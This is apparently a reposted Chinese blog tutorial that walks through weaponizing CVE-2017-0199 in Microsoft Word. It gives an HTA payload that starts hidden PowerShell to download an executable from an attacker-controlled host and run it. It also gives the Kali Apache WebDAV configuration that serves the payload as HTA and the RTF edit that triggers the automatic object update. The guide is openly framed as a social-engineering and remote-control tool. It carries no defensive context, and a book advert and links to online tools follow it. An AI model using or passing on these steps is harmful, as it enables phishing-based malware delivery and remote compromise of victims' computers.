CVE-2017-0199 Kali做服务器 远控结合 Doc社工神器

栏目: 服务器 · Apache · 发布时间: 7年前

内容简介:CVE-2017-0199 Kali做服务器 远控结合 Doc社工神器

Apache利用的是kalia

Kali下2个路径

web 路径 /var/www/html

apace 配置文件路径 /etc/apache2/apache2.conf

准备文件2个

1:poc

POC的内容:

<script>
poc=new ActiveXObject("WScript.Shell");
poc.run('%SystemRoot%/system32/WindowsPowerShell/v1.0/powershell.exe -windowstyle hidden (new-object System.Net.WebClient).DownloadFile(\'http://ip_url/Atask.exe\', \'c:/windows/temp/Atask.exe\'); c:/windows/temp/Atask.exe', 0);window.close();
</script>

2:word 文档

随意 例如: a.docx

一:KaLi  开启DAV

a2enmod dav 
a2enmod dav_fs 
a2enmod dav_lock 
a2enmod headers

service apache2 restart

二:Kali服务器上操作

mv a.docx /var/www/html/a.rtf

三:本机电脑客户端操作

 新建word => 插入 => 对象 -> 文件名字 http://ip/a.rtf 勾选 连接到文件
保存成 rtf文件 b.rtf

四:Kali服务器上 删除 /var/www/html/a.rtf 文件,把一开始准备的 poc 复制成 a.rtf

mv poc /var/www/html/a.rtf

之后 修改Apache配置文件 vim /etc/apache2/apache2.conf

增加如下内容:

<Directory /> 
Dav on 
</Directory>

<Directory /var/www/html/ms/> 
Header set Content-Type "application/hta" 
</Directory>

保存 service apache2 restart

五:客户端

用文本编辑器 打开 b.rtf 找到:
`\object\objautlink\rsltpict`

替换为
`\object\objautlink\objupdate\rsltpict`

保存。。。制作完成


以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

算法竞赛入门经典(第2版)

算法竞赛入门经典(第2版)

刘汝佳 / 清华大学出版社 / 2014-6-1 / CNY 49.80

《算法竞赛入门经典(第2版)》是一本算法竞赛的入门与提高教材,把C/C++语言、算法和解题有机地结合在一起,淡化理论,注重学习方法和实践技巧。全书内容分为12 章,包括程序设计入门、循环结构程序设计、数组和字符串、函数和递归、C++与STL入门、数据结构基础、暴力求解法、高效算法设计、动态规划初步、数学概念与方法、图论模型与算法、高级专题等内容,覆盖了算法竞赛入门和提高所需的主要知识点,并含有大量......一起来看看 《算法竞赛入门经典(第2版)》 这本书的介绍吧!

JSON 在线解析
JSON 在线解析

在线 JSON 格式化工具

Base64 编码/解码
Base64 编码/解码

Base64 编码/解码

HEX HSV 转换工具
HEX HSV 转换工具

HEX HSV 互换工具